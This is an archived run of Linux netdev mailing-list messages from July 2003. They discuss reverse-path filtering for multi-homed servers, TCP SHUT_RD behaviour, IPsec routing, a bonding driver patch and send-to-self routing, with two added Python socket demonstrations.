From Niklas.Edmundsson@hpc2n.umu.se Tue Jul 1 00:37:31 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 00:37:51 -0700 (PDT)
Received: from tekla.ing.umu.se (root@tekla.ing.umu.se [130.239.117.80])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h617bS2x004363
    for ; Tue, 1 Jul 2003 00:37:30 -0700
Received: from tekla.ing.umu.se (nikke@tekla.ing.umu.se [130.239.117.80])
    by tekla.ing.umu.se (8.12.3/8.12.3/Debian-6.4) with ESMTP id h617bQ0j006731
    for ; Tue, 1 Jul 2003 09:37:27 +0200
Date: Tue, 1 Jul 2003 09:37:26 +0200 (CEST)
From: Niklas Edmundsson
X-X-Sender: nikke@tekla.ing.umu.se
To: netdev@oss.sgi.com
Subject: martian packet checks breaks multi-homing
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 3703
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: Niklas.Edmundsson@hpc2n.umu.se
Precedence: bulk
X-list: netdev

Hi!

We are setting up a multi homed server (currently running Linux
2.4.18) connected to several physical networks (due to the fact that
the server is a dhcp server too). All clients talk to the main
interface on the machine, routing is done by the network equipment.

The problem is that when a client tries to talk to the main interface
of the server (not on the same network), the server tags the packets
as martian source and discards them! It's a perfectly valid packet
since the client is not even aware of the server's extra interface on
the network at this point and thus talks to the main interface via the
default gateway and the normal routing on the campus network.

This feature is desirable if you are doing some sort of routing or
firewalling when there is no reason to talk to the other interface,
but when doing multi-homing it's not what you want if you have an
environment where clients talk to a main interface of a machine to
establish communication (due to higher bandwidth or other reasons).
I haven't even been able to find a way to disable or circumvent the
check other than edit the source (fib_validate_source() is rather hard
to read by the way). It would be nice if there existed a runtime way
to disable it.

I have done this setup a number of times using Solaris and AIX boxes,
and it's a simple thing that really ought to work...

If things are unclear or I have forgotten/missed something just tell
me so and I'll try to clarify.

/Nikke
-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Niklas Edmundsson, Admin @ {acc,hpc2n,ing}.umu.se | nikke@hpc2n.umu.se
---------------------------------------------------------------------------
 Egotist: Thinks he's in the groove when he's in a rut
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From nikke@ing.umu.se Tue Jul 1 02:22:53 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 02:23:02 -0700 (PDT)
Received: from tekla.ing.umu.se (root@tekla.ing.umu.se [130.239.117.80])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h619Mp2x014958
    for ; Tue, 1 Jul 2003 02:22:52 -0700
Received: from tekla.ing.umu.se (nikke@tekla.ing.umu.se [130.239.117.80])
    by tekla.ing.umu.se (8.12.3/8.12.3/Debian-6.4) with ESMTP id h619Mo0j009659
    for ; Tue, 1 Jul 2003 11:22:50 +0200
Date: Tue, 1 Jul 2003 11:22:50 +0200 (CEST)
From: Niklas Edmundsson
To: netdev@oss.sgi.com
Subject: Re: martian packet checks breaks multi-homing
In-Reply-To:
Message-ID:
References:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 3704
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: nikke@ing.umu.se
Precedence: bulk
X-list: netdev

On Tue, 1 Jul 2003, Niklas Edmundsson wrote:

>
> Hi!
>
> We are setting up a multi homed server (currently running Linux
> 2.4.18) connected to several physical networks (due to the fact that
> the server is a dhcp server too).
> I haven't even been able to find a way to disable or circumvent the
> check other than edit the source (fib_validate_source() is rather hard
> to read by the way). It would be nice if there existed a runtime way
> to disable it.

Ignore me. Just after I sent this mail I found
/proc/sys/net/ipv4/conf/*/rp_filter which solves all my problems.

Sorry for the inconvenience.

/Nikke - spanks the paranoid debian startup scripts a bit.
-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Niklas Edmundsson, Admin @ {acc,hpc2n,ing}.umu.se | nikke@ing.umu.se
---------------------------------------------------------------------------
 There once was a man from Nantucket.You've been talking to Garibaldi!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From srompf@barkeeper.isg.de Tue Jul 1 02:51:41 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 02:51:51 -0700 (PDT)
Received: from mail.isg.de (rzfoobar.is-asp.com [217.11.194.155])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h619pU2x016820
    for ; Tue, 1 Jul 2003 02:51:31 -0700
Received: from barkeeper.isg.de (barkeeper.frankfurter-softwarefabrik.de [192.168.6.182])
    by mail.isg.de (Postfix) with ESMTP
    id 6D1C51312C1E; Tue, 1 Jul 2003 11:11:27 +0200 (CEST)
Received: from localhost (localhost [[UNIX: localhost]])
    by barkeeper.isg.de (8.9.3/8.9.3) id LAA00936;
    Tue, 1 Jul 2003 11:11:26 +0200
From: Stefan Rompf
To: Niklas Edmundsson , netdev@oss.sgi.com
Subject: Re: martian packet checks breaks multi-homing
Date: Tue, 1 Jul 2003 11:11:05 +0200
User-Agent: KMail/1.5.9.1i
References:
In-Reply-To:
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <200307011111.26762.srompf@isg.de>
X-archive-position: 3705
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: srompf@isg.de
Precedence: bulk
X-list: netdev

On Tuesday, 1 July 2003 09:37, Niklas Edmundsson wrote:

> The problem is that when a client tries to talk to the main interface
> of the server (not on the same network), the server tags the packets
> as martian source and discards them! It's a perfectly valid packet

> If things are unclear or I have forgotten/missed something just tell
> me so and I'll try to clarify.

Have a look at linux/Documentation/networking/ip-sysctl.txt, rp_filter

Stefan

-- 
"doesn't work" is not a magic word to explain everything.

From mtk-lists@gmx.net Tue Jul 1 04:23:57 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 04:24:04 -0700 (PDT)
Received: from mx0.gmx.net (mx0.gmx.net [213.165.64.100])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61BNt2x020920
    for ; Tue, 1 Jul 2003 04:23:56 -0700
Received: (qmail 7717 invoked by uid 0); 1 Jul 2003 11:23:49 -0000
Date: Tue, 1 Jul 2003 13:23:49 +0200 (MEST)
From: mtk-lists@gmx.net
To: netdev@oss.sgi.com
MIME-Version: 1.0
Subject: shutdown() and SHUT_RD on TCP sockets - broken?
X-Priority: 3 (Normal)
X-Authenticated-Sender: #0018454895@gmx.net
X-Authenticated-IP: [212.18.21.202]
Message-ID: <14321.1057058629@www1.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-archive-position: 3706
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: mtk-lists@gmx.net
Precedence: bulk
X-list: netdev

Hello,

I've done quite some searching, but have so far not found an answer to
the question of why does the behaviour described below occur on Linux...

According to SUSv3, if we perform a shutdown(fd, SHUT_RD) on a socket,
then further reads on that socket should be disabled. In the AF_UNIX
domain, all is fine -- things operate as I expect. However, for TCP
sockets, things are different (tested on 2.2.14, and 2.4.20):

1. If we perform a read() on the socket and there is no data, then 0
   (EOF) is (immediately) returned. (This is what I expected.)

2. However, the peer can still write() to the socket, and afterwards
   we can read() that data from the socket, even though the reading
   half of the socket should be shut down. Instead of this behaviour,
   I expected the read() to continue to return 0 as in point 1. This
   is what we see for example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11.
   I thought that most implementations (other than Linux) did things
   this way, but I've just now gone and tested things on Solaris 8,
   and it seems to behave in the same way as Linux.

   I've read the relevant source code to confirm the anomalous
   behaviour described here. But, why do things happen in this way on
   Linux?

3. (A side point.) Looking at Stevens UNPv1, p161, there is a
   statement that after a SHUT_RD, "any data for a TCP socket is
   acknowledged and then silently discarded". This implies to me that
   the sender could keep on writing to the socket and never block.
   However, on Linux, if the peer keeps sending to a socket, then
   eventually (the channel is filled and) it blocks. I see that this
   also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 and Solaris 8.
   Have I misunderstood Stevens, or has something changed since the
   implementation he described (or was his statement wrong)? (In the
   AF_UNIX domain on Linux, the peer gets SIGPIPE/EPIPE if it keeps
   writing after a local SHUT_RD.)

Thanks

Michael

-- 
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Smile, please! Online photo gallery with GMX, no homepage of your own required!
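
[Archive note] For readers who want to reproduce points 1 and 2 above, the following is a minimal sketch in Python rather than C. It assumes a loopback TCP connection is representative of the behaviour being described; the helper name shut_rd_demo and the payload are made up for illustration and do not come from the original mail. It only reports what the local stack does, it does not say which behaviour is right.

```python
import socket
import time


def shut_rd_demo():
    """Return (first, second): what recv() yields after shutdown(SHUT_RD),
    before and after the peer sends more data. Hypothetical helper."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
    listener.listen(1)
    peer = socket.create_connection(listener.getsockname())
    conn, _ = listener.accept()
    listener.close()
    try:
        conn.settimeout(2.0)            # never hang the demo
        conn.shutdown(socket.SHUT_RD)   # shut down the reading half only
        first = conn.recv(1024)         # point 1: nothing is queued
        peer.sendall(b"late data")      # point 2: the peer writes anyway
        time.sleep(0.2)                 # give the segment time to arrive
        second = conn.recv(1024)
    finally:
        peer.close()
        conn.close()
    return first, second


if __name__ == "__main__":
    first, second = shut_rd_demo()
    print("read with nothing queued:", first)
    print("read after peer wrote:   ", second)
```

An empty second result would correspond to the FreeBSD-style behaviour mentioned in point 2; a non-empty one corresponds to what the mail reports for Linux and Solaris 8.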
From ahu@outpost.ds9a.nl Tue Jul 1 06:27:26 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 06:27:45 -0700 (PDT)
Received: from outpost.ds9a.nl (postfix@outpost.ds9a.nl [213.244.168.210])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61DRF2x031102
    for ; Tue, 1 Jul 2003 06:27:15 -0700
Received: by outpost.ds9a.nl (Postfix, from userid 1000)
    id D904440F5; Tue, 1 Jul 2003 14:58:08 +0200 (CEST)
Date: Tue, 1 Jul 2003 14:58:08 +0200
From: bert hubert
To: Andreas Jellinghaus
Cc: "netdev@oss.sgi.com"
Subject: Re: ipsec without interface
Message-ID: <20030701125808.GA19408@outpost.ds9a.nl>
Mail-Followup-To: bert hubert , Andreas Jellinghaus , "netdev@oss.sgi.com"
References: <1054235787.605.21.camel@simulacron>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1054235787.605.21.camel@simulacron>
User-Agent: Mutt/1.3.28i
X-archive-position: 3707
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: ahu@ds9a.nl
Precedence: bulk
X-list: netdev

On Thu, May 29, 2003 at 09:16:27PM +0200, Andreas Jellinghaus wrote:
> sure, the simple configurations work fine with kernel 2.5.* ipsec.
> But I miss the interface and things I did with it. How are these
> setups supposed to work without an interface?
>
> a) in iptables allow everything coming from ipsec0,
>    allow only ssh and ipsec on eth0.

iptables can filter on ESP/AH presence.

> b) source address selection. put the default route on ipsec0,

Do you need a separate source address?

-- 
http://www.PowerDNS.com      Open source, database driven DNS Software
http://lartc.org           Linux Advanced Routing & Traffic Control HOWTO

From aj@dungeon.inka.de Tue Jul 1 06:31:33 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 06:31:49 -0700 (PDT)
Received: from mail.inka.de (mail@quechua.inka.de [193.197.184.2])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61DVW2x031439
    for ; Tue, 1 Jul 2003 06:31:33 -0700
Received: from dungeon.inka.de (uucp@[127.0.0.1])
    by mail.inka.de with uucp (rmailwrap 0.5)
    id 19XLEI-0005f6-00; Tue, 01 Jul 2003 15:31:30 +0200
Received: from [192.168.3.1] (unknown [192.168.3.1])
    by dungeon.inka.de (Postfix) with ESMTP
    id F11C421210; Tue, 1 Jul 2003 15:31:24 +0200 (CEST)
Subject: Re: ipsec without interface
From: Andreas Jellinghaus
To: bert hubert
Cc: "netdev@oss.sgi.com"
In-Reply-To: <20030701125808.GA19408@outpost.ds9a.nl>
References: <1054235787.605.21.camel@simulacron>
    <20030701125808.GA19408@outpost.ds9a.nl>
Content-Type: text/plain
Message-Id: <1057066404.4054.9.camel@simulacron>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.0
Date: 01 Jul 2003 15:33:24 +0200
Content-Transfer-Encoding: 7bit
X-archive-position: 3708
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: aj@dungeon.inka.de
Precedence: bulk
X-list: netdev

On Tue, 2003-07-01 at 14:58, bert hubert wrote:
> On Thu, May 29, 2003 at 09:16:27PM +0200, Andreas Jellinghaus wrote:
> > sure, the simple configurations work fine with kernel 2.5.* ipsec.
> > But I miss the interface and things I did with it. How are these
> > setups supposed to work without an interface?
> >
> > a) in iptables allow everything coming from ipsec0,
> >    allow only ssh and ipsec on eth0.
>
> iptables can filter on ESP/AH presence.

the packet is seen once as ESP/AH and once as normal (e.g. TCP)
packet. where is the connection?
how can you see that a packet came in first as ESP/AH packet
and was then decrypted, and did not come in without ipsec?

with freeswan that was easy: drop everything, unless it
is from interface ipsec0. And you always knew, packets from
ipsec0 came in with valid ipsec encryption, that was easy to
make sure.

and now? use fwmark? even if that works, it's not as easy.

>
> > b) source address selection. put the default route on ipsec0,
>
> Do you need a separate source address?

I'm a "road warrior", so the local wireless lan gives me a
192.168.* address. For my ipsec tunnel to $company gateway
I need to get an official address assigned, so I can use that to
access the company network, or even the internet (if I don't
trust the local network, and don't want unencrypted connections
to the internet).

I think such a setup will be quite common.

local lan          some nat           company gateway
192.168.0.*  <->   192.168.0.1  <->   1.2.3.4

ipsec tunnel 1.2.3.5 <-> 1.2.3.4
connection will use 1.2.3.5 <-> 1.2.3.80 (e.g. company file server,
allowing access from 1.2.3.*).

ip route del default
ip route add default gw 192.168.0.1 src 1.2.3.5

yes, that works. but it's not nice.

also company gateway needs a
ip route add 1.2.3.5 dev eth0/1/2/whatever
even though no packet to "1.2.3.5" will ever be on any wire -
the packet will be always encrypted and have a final ip address
somewhere in the internet or wireless network.

hmm. I haven't tried to use an explicit ipip tunnel.
did anyone use ESP in transport mode to encrypt packets
of an IPIP tunnel? that might help me.

Regards, Andreas

From shmulik.hen@intel.com Tue Jul 1 06:44:18 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 06:44:39 -0700 (PDT)
Received: from hermes.fm.intel.com (fmr01.intel.com [192.55.52.18])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61DiH2x031807
    for ; Tue, 1 Jul 2003 06:44:18 -0700
Received: from petasus.fm.intel.com (petasus.fm.intel.com [10.1.192.37])
    by hermes.fm.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h61DdQM00581
    for ; Tue, 1 Jul 2003 13:39:26 GMT
Received: from fmsmsxvs041.fm.intel.com (fmsmsxvs041.fm.intel.com [132.233.42.126])
    by petasus.fm.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h61DbKa02239
    for ; Tue, 1 Jul 2003 13:37:20 GMT
Received: from jrslxjul1.npdj.intel.com ([10.12.254.186])
    by fmsmsxvs041.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070106403620572
    ; Tue, 01 Jul 2003 06:40:38 -0700
Date: Tue, 1 Jul 2003 16:44:11 +0300 (IDT)
From: Shmulik Hen
X-X-Sender:
Reply-To: Shmulik Hen
To: bond-devel , "Chad N. Tindel" , Jay Vosburgh , Jeff Garzik , linux-netdev
cc: Amir Noam , Noam Marom , Shmulik Hen , Tsippy Mendelson
Subject: [patch][bonding] Fix change active for ALB/TLB
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 3709
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: shmulik.hen@intel.com
Precedence: bulk
X-list: netdev

Hi,

The following patch fixes bonding's change active interface operation
for ALB/TLB modes. It used to incorrectly set the old active
interface's state to BACKUP (which is required only for active-backup
mode) and would cause that slave not to take part in load sharing.

It should be applied on latest net-drivers-2.4 BK tree.

-- 
| Shmulik Hen                             |
| Israel Design Center (Jerusalem)        |
| LAN Access Division                     |
| Intel Communications Group, Intel corp. |

diff -Nuarp linux-2.4.22-pre1-netdrvr1/drivers/net/bonding/bond_main.c linux-2.4.22-pre1-netdrvr1-devel/drivers/net/bonding/bond_main.c
--- linux-2.4.22-pre1-netdrvr1/drivers/net/bonding/bond_main.c	Mon Jun 30 15:29:56 2003
+++ linux-2.4.22-pre1-netdrvr1-devel/drivers/net/bonding/bond_main.c	Mon Jun 30 15:29:57 2003
@@ -385,6 +385,9 @@
  *	- In conjunction with fix for ifenslave -c, in
  *	  bond_change_active(), changing to the already active slave
  *	  is no longer an error (it successfully does nothing).
+ *
+ * 2003/06/30 - Amir Noam
+ *	- Fixed bond_change_active() for ALB/TLB modes.
  */
 
 #include
@@ -429,8 +432,8 @@
 #include "bond_3ad.h"
 #include "bond_alb.h"
 
-#define DRV_VERSION		"2.2.13"
-#define DRV_RELDATE		"June 25, 2003"
+#define DRV_VERSION		"2.2.14"
+#define DRV_RELDATE		"June 30, 2003"
 #define DRV_NAME		"bonding"
 #define DRV_DESCRIPTION		"Ethernet Channel Bonding Driver"
 
@@ -1761,8 +1764,11 @@ static int bond_change_active(struct net
 	    (oldactive != NULL)&&
 	    (newactive->link == BOND_LINK_UP)&&
 	    IS_UP(newactive->dev)) {
-		bond_set_slave_inactive_flags(oldactive);
-		bond_set_slave_active_flags(newactive);
+		if (bond_mode == BOND_MODE_ACTIVEBACKUP) {
+			bond_set_slave_inactive_flags(oldactive);
+			bond_set_slave_active_flags(newactive);
+		}
+
 		bond_mc_update(bond, newactive, oldactive);
 		bond_assign_current_slave(bond, newactive);
 		printk("%s : activate %s(old : %s)\n",

From jmorris@intercode.com.au Tue Jul 1 07:00:31 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 07:00:43 -0700 (PDT)
Received: from blackbird.intercode.com.au (IDENT:vrOxXT2uj4iTAwgLdo5TiySDE/u7yS28@blackbird.intercode.com.au [203.32.101.10])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61E0S2x003973
    for ; Tue, 1 Jul 2003 07:00:30 -0700
Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12])
    by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h61E0Er07026;
    Wed, 2 Jul 2003 00:00:14 +1000
Date: Wed, 2 Jul 2003 00:00:13 +1000 (EST)
From: James Morris
To: Andreas Jellinghaus
cc: bert hubert , "netdev@oss.sgi.com"
Subject: Re: ipsec without interface
In-Reply-To: <1057066404.4054.9.camel@simulacron>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 3710
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jmorris@intercode.com.au
Precedence: bulk
X-list: netdev

On 1 Jul 2003, Andreas Jellinghaus wrote:

> hmm. I haven't tried to use an explicit ipip tunnel.
> did anyone use ESP in transport mode to encrypt packets
> of an IPIP tunnel? that might help me.

It's known to work on a gre tunnel (if you manually adjust the mtu), so
ipip probably works.

- James
-- 
James Morris

From ja@ssi.bg Tue Jul 1 14:53:44 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 14:53:51 -0700 (PDT)
Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61LrZ2x015425
    for ; Tue, 1 Jul 2003 14:53:40 -0700
Received: from localhost (IDENT:ja@localhost [127.0.0.1])
    by u.domain.uli (8.11.6/8.11.6) with ESMTP id h61LvLG02312;
    Wed, 2 Jul 2003 00:57:21 +0300
Date: Wed, 2 Jul 2003 00:57:21 +0300 (EEST)
From: Julian Anastasov
X-X-Sender: ja@u.domain.uli
To: Ben Greear
cc: netdev@oss.sgi.com
Subject: Re: send-to-self (was Re: routing bug report for 2.4)
In-Reply-To: <3EFFEDD7.5020205@candelatech.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 3711
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: ja@ssi.bg
Precedence: bulk
X-list: netdev

	Hello,

On Mon, 30 Jun 2003, Ben Greear wrote:

> You should be able to easily test most of the changes your code
> if you have a machine with two ethernet interfaces and a loopback
> cable...

	ok, tested the 2.5 version, the patch files are updated:

http://www.ssi.bg/~ja/#loop

- added missing dev_put on ENETDOWN
- removed the checks that ignore oif for local routes as Alexey suggests

	I have tried simple tests: ICMP, telnet. What I see
is that the 2.5 rt_set_nexthop() does not set sysctl_ip_default_ttl if
res->fi is NULL and that causes the icmp echo packets to use
ttl=0. May be there are still some noisy places like arp_set_predefined,
it will need further investigation. I'm stopping here, for now.

> My requirements are:
>
> 1) Both ethernet ports communicate over the external link, UDP & IP traffic.

	Done

>     Third-party programs if possible, thus I set the flag on the interface in
>     my patch, not on an individual socket, though I do have to BINDTODEVICE and
>     policy-base base route to get things working right...

	Now you have 2 options:

- bind to src IP: the app needs to be aware for that

- ip route replace local IP2 dev DEV2 ... src IP1 table local: the app
does not need to be aware to use this feature

	Now using BINDTODEVICE can cause problems with this feature,
because we do not ignore oif for local destinations, you risk to
miss the local route and arp_filter to break the things or worse (not
tested)

> 1b) Allow both same-subnet comm (eth1 & eth2 are on same subnet), and also
>      routed traffic (eth1 & eth2 have their own default router, similar to the
>      previously discussed routing setup)

	all other routes remain unchanged, I hope

> 2) Allow normal non-looped communication on the ports, including policy-based routing
>     based on source addr.

	hm, you better know what you mean. As expected, this feature
has its drawbacks. The safe way is to teach some apps to bind to
IP1 and the apps that are unaware for these loops to use the prefsrc
and thus to use lo. There is no much space for improvement here but
I'm open for suggestions.
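
[Archive note] The first option above ("bind to src IP") is something an application has to do itself. As a rough illustration, here is a minimal sketch in Python; the helper name connect_from is hypothetical, and the loopback addresses are only stand-ins for IP1 and IP2 so that the sketch runs on a single machine. It says nothing about how the patched kernel then routes the traffic.

```python
import socket


def connect_from(src_ip, dst):
    """Open a TCP connection to dst=(host, port) using src_ip as the
    local address. Hypothetical helper; local port 0 lets the kernel
    choose an ephemeral port."""
    return socket.create_connection(dst, timeout=5,
                                    source_address=(src_ip, 0))


if __name__ == "__main__":
    # Loopback stand-ins for IP1/IP2 (an assumption for the demo only).
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    client = connect_from("127.0.0.1", listener.getsockname())
    conn, peer_addr = listener.accept()
    print("server sees source address:", peer_addr[0])
    for s in (client, conn, listener):
        s.close()
```

The second option needs no application change at all, since the preferred source address then comes from the route itself.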

> Thanks,
> Ben

Regards

--
Julian Anastasov

From greearb@candelatech.com Tue Jul 1 15:07:18 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 15:07:23 -0700 (PDT)
Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61M7I2x015866
    for ; Tue, 1 Jul 2003 15:07:18 -0700
Received: from candelatech.com (localhost.localdomain [127.0.0.1])
    by grok.yi.org (8.12.8/8.12.8) with ESMTP id h61M7CKk018766;
    Tue, 1 Jul 2003 15:07:12 -0700
Message-ID: <3F020610.2080109@candelatech.com>
Date: Tue, 01 Jul 2003 15:07:12 -0700
From: Ben Greear
Organization: Candela Technologies
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Julian Anastasov
CC: netdev@oss.sgi.com
Subject: Re: send-to-self (was Re: routing bug report for 2.4)
References:
In-Reply-To:
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 3712
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: greearb@candelatech.com
Precedence: bulk
X-list: netdev

Julian Anastasov wrote:
> 	Hello,
>
> On Mon, 30 Jun 2003, Ben Greear wrote:
>
>
>>You should be able to easily test most of the changes your code
>>if you have a machine with two ethernet interfaces and a loopback
>>cable...
>
>
> 	ok, tested the 2.5 version, the patch files are updated:
>
> http://www.ssi.bg/~ja/#loop
>
> - added missing dev_put on ENETDOWN
> - removed the checks that ignore oif for local routes as Alexey suggests
>
> 	I have tried simple tests: ICMP, telnet. What I see
> is that the 2.5 rt_set_nexthop() does not set sysctl_ip_default_ttl if
> res->fi is NULL and that causes the icmp echo packets to use
> ttl=0. May be there are still some noisy places like arp_set_predefined,
> it will need further investigation. I'm stopping here, for now.

How did you get telnet to bind to a particular local interface? Also, what
ping syntax did you use? Did you have to modify either of these applications
to get them to work?

I looked at the patch...but don't have a good enough grasp of the routing
code to provide a useful critique. I believe my patch _is_ smaller though ;)

Thanks,
Ben

>
>
>>My requirements are:
>>
>>1) Both ethernet ports communicate over the external link, UDP & IP traffic.
>
>
> 	Done
>
>
>>    Third-party programs if possible, thus I set the flag on the interface in
>>    my patch, not on an individual socket, though I do have to BINDTODEVICE and
>>    policy-base base route to get things working right...
>
>
> 	Now you have 2 options:
>
> - bind to src IP: the app needs to be aware for that
>
> - ip route replace local IP2 dev DEV2 ... src IP1 table local: the app
> does not need to be aware to use this feature
>
> 	Now using BINDTODEVICE can cause problems with this feature,
> because we do not ignore oif for local destinations, you risk to
> miss the local route and arp_filter to break the things or worse (not
> tested)
>
>
>>1b) Allow both same-subnet comm (eth1 & eth2 are on same subnet), and also
>>     routed traffic (eth1 & eth2 have their own default router, similar to the
>>     previously discussed routing setup)
>
>
> 	all other routes remain unchanged, I hope
>
>
>>2) Allow normal non-looped communication on the ports, including policy-based routing
>>    based on source addr.
>
>
> 	hm, you better know what you mean. As expected, this feature
> has its drawbacks. The safe way is to teach some apps to bind to
> IP1 and the apps that are unaware for these loops to use the prefsrc
> and thus to use lo. There is no much space for improvement here but
> I'm open for suggestions.
>
>
>>Thanks,
>>Ben
>
>
> Regards
>
> --
> Julian Anastasov
>

-- 
Ben Greear       President of Candela Technologies Inc      http://www.candelatech.com
ScryMUD:  http://scry.wanfear.com     http://scry.wanfear.com/~greear

From linux-netdev@gmane.org Tue Jul 1 15:17:19 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 15:17:26 -0700 (PDT)
Received: from main.gmane.org (main.gmane.org [80.91.224.249])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61MHH2x016286
    for ; Tue, 1 Jul 2003 15:17:18 -0700
Received: from list by main.gmane.org with local (Exim 3.35 #1 (Debian))
    id 19XT27-0006BX-00
    for ; Tue, 01 Jul 2003 23:51:27 +0200
X-Injected-Via-Gmane: http://gmane.org/
To: netdev@oss.sgi.com
Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian))
    id 19XT24-0006B5-00
    for ; Tue, 01 Jul 2003 23:51:24 +0200
From: Jason Lunz
Subject: [PATCH 2.4.22-bk] dev->promiscuity refcounting broken in af_packet.c
Date: Tue, 1 Jul 2003 21:51:23 +0000 (UTC)
Organization: PBR Streetgang
Lines: 99
Message-ID:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Complaints-To: usenet@main.gmane.org
User-Agent: slrn/0.9.7.4 (Linux)
X-archive-position: 3713
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: lunz@falooley.org
Precedence: bulk
X-list: netdev

niz@vencraft.com said:
> A number of people have mentioned that they get a weird situation
> where when they *start* a program that does promiscuous network reads
> (with, say, 'tcpdump -i eth0'). They then get a kernel message
> "left promiscuous mode" when the program starts and the message
> "entered promiscuous mode" when it exits - the exact opposite of
> what should happen.

Thanks for finding this! This has been happening to me for over a year,
but always so rarely that I never bothered to really track it down.

Your patch isn't really correct, though.
Aside from the whitespace damage, it doesn't really address the
problem. Clamping the refcount at zero only stops the bleeding. The
